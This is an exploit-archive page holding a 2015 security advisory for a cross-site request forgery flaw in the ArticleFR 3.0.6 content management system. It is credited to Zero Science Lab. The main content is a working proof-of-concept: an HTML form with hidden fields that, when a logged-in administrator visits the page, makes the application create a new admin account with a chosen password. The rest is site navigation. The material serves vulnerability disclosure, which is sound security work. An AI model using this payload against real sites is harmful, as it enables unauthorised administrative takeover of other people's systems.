ArticleFR 3.0.6 Cross Site Request Forgery

ArticleFR 3.0.6 Cross Site Request Forgery: Posted Jul 14, 2015; Authored by LiquidWorm | Site zeroscience.mk; ArticleFR version 3.0.6 allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.; tags | exploit, web; SHA-256 | fc4cceecf98e26b34c3709337914564c092fc67141584a9307de989d67ef1162; Download | Favorite | View

ArticleFR 3.0.6 Cross Site Request Forgery


ArticleFR 3.0.6 CSRF Add Admin Exploit


Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6

Summary: A lightweight fully featured content (article / video)
management system. Comes with a pluginable and multiple module
framework system.

Desc: The application allows users to perform certain actions
via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user
visits a malicious web site.

Tested on: nginx/1.6.2
           PHP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5248
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5248.php


21.06.2015

--


<html>
  <body>
    <form action="http://127.0.0.1/dashboard/users/create/" method="POST">
      <input type="hidden" name="username" value="thricer" />
      <input type="hidden" name="name" value="The_Hacker" />
      <input type="hidden" name="password" value="s3cr3t" />
      <input type="hidden" name="email" value="lab@zeroscience.mk" />
      <input type="hidden" name="website" value="http://www.zeroscience.mk" />
      <input type="hidden" name="blog" value="zsl" />
      <input type="hidden" name="membership" value="admin" />
      <input type="hidden" name="isactive" value="active" />
      <input type="hidden" name="submit" value="Create" />
      <input type="submit" value="Request" />
    </form>
  </body>
</html>

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

ArticleFR 3.0.6 Cross Site Request Forgery

ArticleFR 3.0.6 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ArticleFR 3.0.6 Cross Site Request Forgery

Share This

ArticleFR 3.0.6 Cross Site Request Forgery

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems